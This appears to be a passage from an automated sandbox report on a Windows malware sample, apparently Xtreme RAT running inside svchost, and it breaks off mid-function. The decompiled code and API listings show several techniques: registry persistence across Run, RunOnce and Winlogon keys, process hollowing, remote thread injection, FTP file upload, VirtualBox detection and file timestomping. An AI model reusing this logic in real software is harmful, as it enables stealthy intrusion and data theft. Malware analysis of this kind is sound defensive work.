ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C89476
CloseHandle.KERNEL32(00000000), ref: 00C8947E
GetLastError.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C89497
CloseHandle.KERNEL32(00000000), ref: 00C894AD
Sleep.KERNEL32(00001388,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894B7

Strings

Software\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 00C89186, 00C891B8
Load, xrefs: 00C89181, 00C891B3
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, xrefs: 00C89256, 00C8928C
Shell, xrefs: 00C891E7, 00C8920F
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00C89112, 00C89148
open, xrefs: 00C8946F
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00C89033, 00C89075
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 00C891EC, 00C89214
StubPath, xrefs: 00C890B7

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8941B, Relevance: 31.9, APIs: 9, Strings: 9, Instructions: 356
sleepCrypto

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00C8941B() {
				void* _t81;
				void* _t86;
				void* _t121;
				void* _t143;
				void* _t257;
				void* _t258;
				void* _t259;
				void* _t262;
				intOrPtr _t278;
				intOrPtr _t281;
				void* _t305;
				intOrPtr _t306;

				E00C814F0();
				while(1) {
					E00C83674( *((intOrPtr*)(_t305 + 8)) + 0x1a26);
					E00C83674( *((intOrPtr*)(_t305 + 8)) + 0x181c);
					goto L28;
					do {
						do {
							L28:
							_t81 = E00C8263C(0, 0,  *((intOrPtr*)(_t305 + 8)) + 0x1310); // executed
							_t258 = _t81;
							if(GetLastError() == 0xb7) {
								CloseHandle(_t258);
							} else {
								CloseHandle(_t258);
								ShellExecuteW(0, L"open",  *((intOrPtr*)(_t305 + 8)) + 0x181c, 0, 0, 0); // executed
							}
							_t86 = E00C8263C(0, 0,  *((intOrPtr*)(_t305 + 8)) + 0x1326); // executed
							_t257 = _t86;
							if(GetLastError() != 0xb7) {
								CloseHandle(_t257);
							} else {
								ExitProcess(0);
							}
							Sleep(0x1388); // executed
							if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x1258)) == 1) {
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12d8)) == 1) {
									E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t252, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c); // executed
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12d9)) == 1) {
									E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t243, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c); // executed
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12da)) == 1) {
									SHDeleteKeyW(0x80000001,  *((intOrPtr*)(_t305 + 8)) + 0x1e3a); // executed
									E00C888D0(0x80000002,  *((intOrPtr*)(_t305 + 8)) + 0x1e3a, 2, E00C82E48( *((intOrPtr*)(_t305 - 0x14))) + _t234, 0,  *((intOrPtr*)(_t305 - 0x14))); // executed
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f2)) == 1) {
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f3)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t215, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t224, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f4)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t199, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t207, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f5)) == 1) {
										E00C888D0(0x80000001, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48( *((intOrPtr*)(_t305 - 0x18))) + _t185, 0,  *((intOrPtr*)(_t305 - 0x18)));
										E00C888D0(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48( *((intOrPtr*)(_t305 - 0x18))) + _t191, 0,  *((intOrPtr*)(_t305 - 0x18)));
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f6)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t169, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t178, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
								}
							}
						} while (E00C835B0( *((intOrPtr*)(_t305 + 8)) + 0x181c) != 0 || E00C834C4( *((intOrPtr*)(_t305 + 8)) + 0x1a26) == 0);
						if( *((intOrPtr*)(_t305 - 0xc)) != 0) {
							if(__eflags <= 0) {
								goto L24;
							}
							L23:
							E00C83218( *((intOrPtr*)(_t305 + 8)) + 0x181c,  *((intOrPtr*)(_t305 - 4)),  *((intOrPtr*)(_t305 - 0x10)),  *((intOrPtr*)(_t305 - 0xc)));
							goto L24;
						}
						if( *((intOrPtr*)(_t305 - 0x10)) <= 0) {
							goto L24;
						}
						goto L23;
						L24:
					} while ( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x1235)) != 1);
					SetFileAttributesW( *((intOrPtr*)(_t305 + 8)) + 0x1a26, 0x80);
					SetFileAttributesW( *((intOrPtr*)(_t305 + 8)) + 0x181c, 0x80);
					E00C81248();
					_push(_t305);
					_push(0xc89399);
					_push( *[fs:eax]);
					 *[fs:eax] = _t306;
					_push(E00C812A4(0x1b) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xb) + 1);
					_t121 = E00C812A4(6);
					_pop(_t259);
					E00C83BC4( *((intOrPtr*)(_t305 + 8)) + 0x1a26, _t257, _t259, _t121 + 0x7d1);
					_pop(_t278);
					 *[fs:eax] = _t278;
					_push(_t305);
					_push(0xc89416);
					_push( *[fs:eax]);
					 *[fs:eax] = _t306;
					_push(E00C812A4(0x1b) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xb) + 1);
					_t143 = E00C812A4(6);
					_pop(_t262);
					E00C83BC4( *((intOrPtr*)(_t305 + 8)) + 0x181c, _t257, _t262, _t143 + 0x7d1);
					_pop(_t281);
					 *[fs:eax] = _t281;
				}
			}

0x00c8941b
0x00c89420
0x00c89428
0x00c89435
0x00c89435
0x00c8943a
0x00c8943a
0x00c8943a
0x00c89447
0x00c8944c
0x00c89458
0x00c8947e
0x00c8945a
0x00c8945b
0x00c89476
0x00c89476
0x00c89490
0x00c89495
0x00c894a1
0x00c894ad
0x00c894a3
0x00c894a5
0x00c894a5
0x00c894b7
0x00c88ffa
0x00c8900a
0x00c8903d
0x00c8903d
0x00c8904c
0x00c8907f
0x00c8907f
0x00c8908e
0x00c8909e
0x00c890ca
0x00c890ca
0x00c890d9
0x00c890e9
0x00c8911c
0x00c89152
0x00c89152
0x00c89161
0x00c89190
0x00c891c2
0x00c891c2
0x00c891d1
0x00c891f6
0x00c8921e
0x00c8921e
0x00c8922d
0x00c89260
0x00c89296
0x00c89296
0x00c8922d
0x00c890d9
0x00c892a8
0x00c892c9
0x00c892d3
0x00000000
0x00000000
0x00c892d5
0x00c892e6
0x00000000
0x00c892e6
0x00c892cf
0x00000000
0x00000000
0x00000000
0x00c892eb
0x00c892ee
0x00c89309
0x00c8931c
0x00c89321
0x00c89328
0x00c89329
0x00c8932e
0x00c89331
0x00c8933f
0x00c8934b
0x00c89357
0x00c89363
0x00c8936f
0x00c89375
0x00c89389
0x00c8938a
0x00c89391
0x00c89394
0x00c893a5
0x00c893a6
0x00c893ab
0x00c893ae
0x00c893bc
0x00c893c8
0x00c893d4
0x00c893e0
0x00c893ec
0x00c893f2
0x00c89406
0x00c89407
0x00c8940e
0x00c89411
0x00c89411

APIs

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

SHDeleteKeyW.SHLWAPI(80000001,?), ref: 00C8909E

Part of subcall function 00C888D0: RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\FakeMessage,?), ref: 00C888E0
Part of subcall function 00C888D0: RegSetValueExW.ADVAPI32(?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002,00000004), ref: 00C888F8
Part of subcall function 00C888D0: RegCloseKey.ADVAPI32(?,?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002), ref: 00C88907

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

ExitProcess.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894A5

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

SetFileAttributesW.KERNEL32(?,00000080), ref: 00C89309
SetFileAttributesW.KERNEL32(?,00000080,?,00000080), ref: 00C8931C

Part of subcall function 00C81248: GetSystemTime.KERNEL32(?), ref: 00C81252

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,002C6790,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

GetLastError.KERNEL32(00000000,00000000,?), ref: 00C8944E
CloseHandle.KERNEL32(00000000), ref: 00C8945B
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C89476
CloseHandle.KERNEL32(00000000), ref: 00C8947E
GetLastError.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C89497
CloseHandle.KERNEL32(00000000), ref: 00C894AD
Sleep.KERNEL32(00001388,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894B7

Strings

Software\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 00C89186, 00C891B8
Load, xrefs: 00C89181, 00C891B3
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, xrefs: 00C89256, 00C8928C
Shell, xrefs: 00C891E7, 00C8920F
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00C89112, 00C89148
open, xrefs: 00C8946F
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00C89033, 00C89075
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 00C891EC, 00C89214
StubPath, xrefs: 00C890B7

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C835B0, Relevance: 3.0, APIs: 2, Instructions: 16

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00C835B0(WCHAR* __eax) {
				void* _t2;
				void* _t5;
				struct _WIN32_FIND_DATAW* _t6;

				_t2 = FindFirstFileW(__eax, _t6); // executed
				if(_t2 != 0xffffffff) {
					_t5 = 1;
				} else {
					_t5 = 0;
				}
				CloseHandle(_t2);
				return _t5;
			}

0x00c835b9
0x00c835c1
0x00c835c7
0x00c835c3
0x00c835c3
0x00c835c3
0x00c835ca
0x00c835d8

APIs

FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
CloseHandle.KERNEL32(00000000), ref: 00C835CA

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C888D0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
registry

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00C888D0(void* __eax, short* __edx, int _a4, int _a8, char* _a16) {
				void* _v8;
				long _t13;
				void* _t17;
				short* _t18;

				_t17 = 0;
				RegCreateKeyW(__eax, __edx,  &_v8); // executed
				_t13 = RegSetValueExW(_v8, _t18, 0, _a4, _a16, _a8); // executed
				if(_t13 == 0) {
					_t17 = 1;
				}
				RegCloseKey(_v8);
				return _t17;
			}

0x00c888d8
0x00c888e0
0x00c888f8
0x00c888ff
0x00c88901
0x00c88901
0x00c88907
0x00c88912

APIs

RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\FakeMessage,?), ref: 00C888E0
RegSetValueExW.ADVAPI32(?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002,00000004), ref: 00C888F8
RegCloseKey.ADVAPI32(?,?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002), ref: 00C88907

Strings

FakeMessage, xrefs: 00C888D3, 00C888F3
SOFTWARE\FakeMessage, xrefs: 00C888DE

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8263C, Relevance: 1.5, APIs: 1, Instructions: 14

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00C8263C(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, WCHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexW(_a4,  &(_a12[0]) & 0x0000007f, _t4); // executed
				return _t8;
			}

0x00c8263f
0x00c82647
0x00c82652
0x00c82658

APIs

CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C833A8, Relevance: 1.3, APIs: 1, Instructions: 50

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00C833A8(void* __eax, void* __edx, void* __eflags) {
				void* _t3;
				void* _t8;
				void* _t17;
				void* _t23;
				void* _t34;
				void* _t35;
				intOrPtr* _t36;

				_t35 = __edx;
				_t23 = __eax;
				_t3 = E00C82E48(__eax);
				_t8 = VirtualAlloc(0, _t3 + _t3 + E00C82E48(_t35) + _t5, 0x1000, 4); // executed
				_t34 = _t8;
				E00C82E48(_t23);
				E00C82914(_t34, _t23);
				_push(E00C82E48(_t35) + _t14);
				_t17 = E00C82E48(_t23);
				_push(0);
				_push(_t17 + _t17);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				E00C82914(_t34 +  *_t36, _t35);
				return _t34;
			}

0x00c833ab
0x00c833ad
0x00c833b1
0x00c833d1
0x00c833d6
0x00c833da
0x00c833e7
0x00c833f5
0x00c833f8
0x00c83401
0x00c83402
0x00c83405
0x00c83409
0x00c83413
0x00c8341d

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Non-executed Functions

Function 00C84600, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223
injectionthreadprocess

C-Code - Quality: 68%

			E00C84600(long __eax, void** __ecx, WCHAR* __edx, void* __eflags, intOrPtr _a4) {
				WCHAR* _v8;
				char _v9;
				void _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v92;
				long _v256;
				long _v260;
				void* _v288;
				intOrPtr _v300;
				signed short _v334;
				void* _v340;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				long _v372;
				void* _v380;
				struct _PROCESS_INFORMATION _v396;
				struct _CONTEXT _v668;
				int _t80;
				void* _t81;
				int _t113;
				int _t119;
				long _t149;
				intOrPtr _t167;
				intOrPtr _t168;
				intOrPtr _t171;
				signed int _t172;
				void** _t173;
				void* _t175;
				void* _t176;
				intOrPtr* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;

				_t173 = __ecx;
				_v8 = __edx;
				_t149 = __eax;
				_t171 = _a4;
				 *((intOrPtr*)(__ecx)) = 0;
				_v9 = 0;
				_push(0xc848a9);
				_push( *[fs:edx]);
				 *[fs:edx] = _t178;
				E00C81284( &(_v668.ExtendedRegisters), 0x44);
				E00C81284( &_v396, 0x10);
				E00C81284( &_v668, 0xcc);
				_v668.ExtendedRegisters.cb = 0x44;
				_v668.ContextFlags = 0x10007;
				E00C845F0();
				_t167 = _t149 + _v32;
				E00C845F0();
				if(_t171 == 0) {
					_t80 = CreateProcessW(0, _v8, 0, 0, 0, 4, 0, 0,  &(_v668.ExtendedRegisters),  &_v396);
					asm("sbb eax, eax");
					_t81 = _t80 + 1;
				} else {
					_t167 = _t171;
					E00C82914( &_v396, _t167);
					_t81 = 1;
				}
				if(_t81 == 1) {
					 *_t173 = _v396.hProcess;
					Sleep(0xc8);
					GetThreadContext(_v396.hThread,  &_v668);
					ReadProcessMemory(_v396.hProcess, _v668.Ebx + 8,  &_v24, 4,  &_v20);
					NtUnmapViewOfSection(_v396.hProcess,  &_v24);
					_v16 = VirtualAllocEx(_v396.hProcess, _v288, _v260, 0x3000, 4);
					WriteProcessMemory(_v396.hProcess, _v16, _t149, _v256,  &_v20);
					_v28 = _v32 + 0xf8;
					_t175 = (_v334 & 0x0000ffff) - 1;
					if(_t175 >= 0) {
						_t176 = _t175 + 1;
						_t172 = 0;
						do {
							asm("cdq");
							_push(_t167);
							_push(_t149);
							asm("adc edx, [esp+0x4]");
							_t179 = _t178 + 8;
							_push(0);
							_push(_v28 +  *_t178);
							asm("cdq");
							asm("adc edx, [esp+0x4]");
							_t180 = _t179 + 8;
							E00C845F0();
							_push( &_v20);
							_push(_v364);
							asm("cdq");
							_t167 = 0;
							asm("adc edx, [esp+0x4]");
							_t178 = _t180 + 8;
							WriteProcessMemory(_v396.hProcess, _v16 + _v368, _v360 +  *_t180, _t149, (_t172 << 3) + (_t172 << 3) * 4 +  *_t179);
							VirtualProtectEx(_v396.hProcess, _v16 + _v368, _v372, 0x40,  &_v24);
							_t172 = _t172 + 1;
							_t176 = _t176 - 1;
						} while (_t176 != 0);
					}
					_t113 = WriteProcessMemory(_v396, _v668.Ebx + 8,  &_v16, 4,  &_v20);
					asm("sbb eax, eax");
					_v9 = _t113 + 1;
					_v668.Eax = _v16 + _v300;
					if(_v9 == 1) {
						_t119 = SetThreadContext(_v396.hThread,  &_v668);
						asm("sbb eax, eax");
						_v9 = _t119 + 1;
						ResumeThread(_v396.hThread);
					}
				}
				_pop(_t168);
				 *[fs:eax] = _t168;
				return 0;
			}

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C846D4
Sleep.KERNEL32(000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,00C848A9,?,00C8FCCC,00000000), ref: 00C846F4
GetThreadContext.KERNEL32(?,?), ref: 00C84707
ReadProcessMemory.KERNEL32(?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C84727
NtUnmapViewOfSection.NTDLL(?,?), ref: 00C84737
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000), ref: 00C84758
WriteProcessMemory.KERNEL32(?,?,00000000,?,?,?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8), ref: 00C84777
WriteProcessMemory.KERNEL32(?,?,?), ref: 00C84809
VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?), ref: 00C8482C
WriteProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004,?), ref: 00C84854
SetThreadContext.KERNEL32(?,?), ref: 00C84885
ResumeThread.KERNEL32(?,?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004), ref: 00C8489A

Strings

D, xrefs: 00C84662

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C83CE4, Relevance: 10.6, APIs: 7, Instructions: 70
injectionthread

C-Code - Quality: 76%

			E00C83CE4(void* __eax, void* __ecx, _Unknown_base(*)()* __edx) {
				long _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				_Unknown_base(*)()* _v36;
				void* _t18;
				void* _t30;
				struct HINSTANCE__* _t32;
				void* _t35;
				long _t36;
				void* _t37;

				_v32 = __ecx;
				_v36 = __edx;
				_t30 = __eax;
				_v28 = 0;
				_t32 = GetModuleHandleA(0);
				_push(0);
				_push(_t32);
				asm("cdq");
				_t18 =  *((intOrPtr*)(_t32 + 0x3c)) + _v20;
				asm("adc edx, [esp+0x4]");
				_t36 =  *(_t18 + 0x50);
				_t35 =  *(_t18 + 0x34);
				VirtualFreeEx(_t30, _t35, 0, 0x8000);
				_t37 = VirtualAllocEx(_t30, _t35, _t36, 0x3000, 0x40);
				if(_t37 != 0) {
					WriteProcessMemory(_t30, _t35, GetModuleHandleA(0), _t36,  &_v24);
					if(_t36 <= _v24) {
						CreateRemoteThread(_t30, 0, 0, _v36, _v32, 0,  &_v20);
						CloseHandle(_t30);
						_v32 = _t37;
					}
				}
				return _v28;
			}

0x00c83ceb
0x00c83cef
0x00c83cf2
0x00c83cf6
0x00c83d01
0x00c83d07
0x00c83d08
0x00c83d0c
0x00c83d0d
0x00c83d10
0x00c83d17
0x00c83d1a
0x00c83d26
0x00c83d3a
0x00c83d3e
0x00c83d50
0x00c83d59
0x00c83d71
0x00c83d77
0x00c83d7c
0x00c83d7c
0x00c83d59
0x00c83d8b

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00C83CFC
VirtualFreeEx.KERNEL32(000000DC,?,00000000,00008000), ref: 00C83D26
VirtualAllocEx.KERNEL32(000000DC,?,?,00003000,00000040,000000DC,?,00000000,00008000), ref: 00C83D35
GetModuleHandleA.KERNEL32(00000000,?,?,000000DC,?,?,00003000,00000040,000000DC,?,00000000,00008000), ref: 00C83D48
WriteProcessMemory.KERNEL32(000000DC,?,00000000,00000000,?,?,000000DC,?,?,00003000,00000040,000000DC,?,00000000,00008000), ref: 00C83D50
CreateRemoteThread.KERNEL32(000000DC,00000000,00000000,?,?,00000000,?), ref: 00C83D71
CloseHandle.KERNEL32(000000DC), ref: 00C83D77

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C87918, Relevance: 10.6, APIs: 7, Instructions: 62
network

C-Code - Quality: 80%

			E00C87918(WCHAR* __eax, WCHAR* __ecx, WCHAR* __edx, WCHAR* _a4, WCHAR* _a8, WCHAR* _a12) {
				WCHAR* _v8;
				WCHAR* _v12;
				int _t14;
				WCHAR* _t25;
				void* _t33;
				void* _t36;

				_v12 = __ecx;
				_v8 = __edx;
				_t25 = __eax;
				_t36 = InternetOpenW(0, 1, 0, 0, 0);
				_t33 = InternetConnectW(_t36, _t25, 0x15, _a8, _a4, 1, 0x8000000, 0);
				_t14 = FtpSetCurrentDirectoryW(_t33, _v8);
				asm("sbb eax, eax");
				WaitForSingleObject(_t14 + 0x00000001 & 0x0000007f, 0xffffffff);
				FtpPutFileW(_t33, _v12, _a12, 2, 0);
				asm("sbb ebx, ebx");
				InternetCloseHandle(_t36);
				InternetCloseHandle(_t33);
				return  &(_t25[0]);
			}

0x00c87921
0x00c87924
0x00c87927
0x00c87938
0x00c87954
0x00c8795b
0x00c87963
0x00c8796c
0x00c8797e
0x00c87986
0x00c8798a
0x00c87990
0x00c8799d

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C87933
InternetConnectW.WININET(00000000,?,00000015,?,?,00000001,08000000,00000000), ref: 00C8794F
FtpSetCurrentDirectoryW.WININET(00000000,?), ref: 00C8795B
WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 00C8796C
FtpPutFileW.WININET(00000000,?,00000000,00000002,00000000), ref: 00C8797E
InternetCloseHandle.WININET(00000000), ref: 00C8798A
InternetCloseHandle.WININET(00000000), ref: 00C87990

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C881BC, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 65

C-Code - Quality: 70%

			E00C881BC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v264;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				void* _t35;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				void* _t58;
				void* _t61;

				_t56 = __edi;
				_v304 = 0;
				_v312 = 0;
				_v316 = 0;
				_v308 = 0;
				_push(_t61);
				_push(0xc882b4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xfffffec8;
				_t58 = E00C8809C(2, 0);
				_v300 = 0x128;
				while(E00C880BC(_t58,  &_v300) != 0) {
					E00C81958( &_v308, 0x104,  &_v264);
					E00C82D90(_v308, 0,  &_v304, _t56, _t58, __eflags);
					_push(_v304);
					E00C82D90("VBoxService.exe", 0,  &_v316, _t56, _t58, __eflags);
					E00C81928( &_v312, E00C81A48(_v316));
					_pop(_t53);
					_t35 = E00C81A9C(_v312, _t53);
					__eflags = _t35;
					if(_t35 <= 0) {
						continue;
					} else {
						CloseHandle(_t58);
					}
					L5:
					_pop(_t54);
					 *[fs:eax] = _t54;
					_push(E00C882BB);
					return E00C81770( &_v316, 4);
				}
				CloseHandle(_t58);
				goto L5;
			}

APIs

Part of subcall function 00C82D90: CharUpperA.USER32(?), ref: 00C82DCE

CloseHandle.KERNEL32(00000000), ref: 00C88272
CloseHandle.KERNEL32(00000000), ref: 00C88291

Strings

VBoxService.exe, xrefs: 00C8823F

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C886CC, Relevance: 1.3, Strings: 1, Instructions: 24

C-Code - Quality: 37%

			E00C886CC(void* __ebx) {
